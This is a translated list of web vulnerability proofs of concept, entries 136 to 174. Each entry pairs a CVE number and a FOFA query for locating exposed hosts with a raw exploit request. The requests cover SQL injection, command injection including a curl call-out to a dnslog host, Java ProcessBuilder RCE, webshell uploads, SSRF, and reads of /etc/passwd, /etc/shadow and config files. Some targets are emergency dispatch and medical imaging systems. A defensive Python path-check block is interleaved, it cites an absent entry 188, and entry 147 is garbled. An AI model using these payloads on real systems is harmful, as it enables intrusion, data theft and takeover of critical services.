Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (福建科立迅) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

  o4 \5 s. H) @1 u6 {147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
4 b: A& G- w* l7 }9 D+ u) SCVE-2024-32399
* y8 A( b4 U5 B& I  M2 mFOFA:body="RaidenMAILD"
, U# t" d- s# c+ h' ]GET /webeditor/../../../windows/win.ini HTTP/1.1' Q& @  ~2 G3 D% G
Host: 127.0.0.1:81
! x7 m& N7 j' p1 a! aCache-Control: max-age=08 W. ], k; J! W4 c/ B4 ^% h
Connection: close% j- J% X( Z6 q' p! A; X& B+ |
8 B8 m% a1 m4 L8 |

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component id
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

Uploaded file: http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT PACS (英飞达医学影像存档与通信系统) WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

bufValue carries the file content (the webshell body); the payload is omitted here. Then call the uploaded handler:
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 path traversal / arbitrary file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 (Keytop) smart parking billing system Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and <fileFlow> carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: request the uploaded file: http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 (Hefeng multimedia information publishing system) QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

Uploaded file: http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 (SIM-card distribution management system) ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) smart campus management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

Uploaded file (renamed by the server): http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
(the middle of the URL is truncated in the source; the injection point is the sortOrder parameter)

166. 中成科信票务管理平台 (Zhongcheng Kexin ticketing management platform) SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host: your-ip
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (LVS lean value management system) DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR (Hongjing eHR) OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle GPS monitoring platform SQL injection
FOFA: body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license-plate recognition camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

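The file-read entries above (160, 167, 170, 172, 173, 174) and the absolute path in entry 188 below all reduce to the same defect: a handler joins a client-supplied path onto a directory and never checks where the result lands. The block below is an added example, not code from the original post or from any of the affected products. It is the string-only check such a handler should make: percent-decode until the input stops changing (a single decode misses the double-encoded form), treat backslashes as separators because several of the targets run on Windows, resolve `..` the way the filesystem would, and then require the result to stay inside the directory the handler is meant to serve. The directory names are placeholders invented for this example; for entry 167 the handler is assumed to join onto the web root but to intend files under `UploadFile` only. The inputs are the path fragments quoted in the entries, plus a double-encoded and a backslash variant that are not on the page.

```python
from urllib.parse import unquote

# Constructed samples: (label, directory the handler joins onto, directory the
# handler is allowed to serve from, client-supplied input). The directories are
# placeholders for this example, not paths from any real product.
SAMPLES = [
    ("160 Nexus",       "/srv/nexus",     "/srv/nexus",            "/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"),
    ("167 DownLoad",    "/srv/app",       "/srv/app/UploadFile",   "UploadFile/../Web.Config"),
    ("170 ExcelReport", "/srv/app/data",  "/srv/app/data",         "../webapps/ROOT/WEB-INF/web.xml"),
    ("172 DT camera",   "/srv/www",       "/srv/www",              "/../../../../etc/passwd"),
    ("173 Check Point", "/srv/cp/files",  "/srv/cp/files",         "aCSHELL/../../../../../../../etc/shadow"),
    ("174 Jinher OA",   "/srv/app/Files", "/srv/app/Files",        "../Resource/JHFileConfig.ini"),
    ("188 attachment",  "/srv/app/files", "/srv/app/files",        "/etc/passwd"),
    ("double-encoded",  "/srv/app/files", "/srv/app/files",        "%252e%252e%252fetc%252fpasswd"),   # not on the page
    ("backslash",       "/srv/app/files", "/srv/app/files",        "..\\..\\Web.Config"),               # not on the page
    ("benign",          "/srv/app/files", "/srv/app/files",        "reports/2024/q1.pdf"),
]


def decode_fully(raw: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded, so a decode loop cannot hang).
    Decoding once and checking once is exactly what %252e%252e defeats."""
    text = raw
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text.replace("\\", "/")   # IIS/Windows targets accept either separator


def resolve(join_dir: str, user_input: str) -> str:
    """Join user_input onto join_dir and normalise like the OS would: '.' is
    dropped, '..' pops one segment, '..' at '/' is ignored. A leading '/' on the
    input is NOT treated as absolute; os.path.join would discard join_dir in
    that case, which is how an input of '/etc/passwd' (entry 188) gets served."""
    stack = [s for s in join_dir.split("/") if s]
    for seg in decode_fully(user_input).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
        else:
            stack.append(seg)
    return "/" + "/".join(stack)


def is_inside(path: str, allowed_dir: str) -> bool:
    """Whole-segment prefix test: /srv/app/UploadFile_old must not pass for an
    allowed_dir of /srv/app/UploadFile, which a bare startswith() would allow."""
    allowed = "/" + "/".join(s for s in allowed_dir.split("/") if s)
    return path == allowed or path.startswith(allowed + "/")


def safe_path(join_dir: str, allowed_dir: str, user_input: str):
    """The check a download handler should make before opening anything:
    the resolved path, or None when it would leave allowed_dir."""
    resolved = resolve(join_dir, user_input)
    return resolved if is_inside(resolved, allowed_dir) else None


def triage(samples=SAMPLES) -> dict:
    return {label: safe_path(j, a, p) for label, j, a, p in samples}


if __name__ == "__main__":
    for label, result in triage().items():
        print(f"{label:16} {'REJECT' if result is None else 'serve ' + result}")
```

Note the entry 188 row: with this join the input `/etc/passwd` resolves to `/srv/app/files/etc/passwd`, a harmless nonexistent file, which is the point of refusing to treat client input as absolute.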
174. 金和OA (Jinher OA) C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
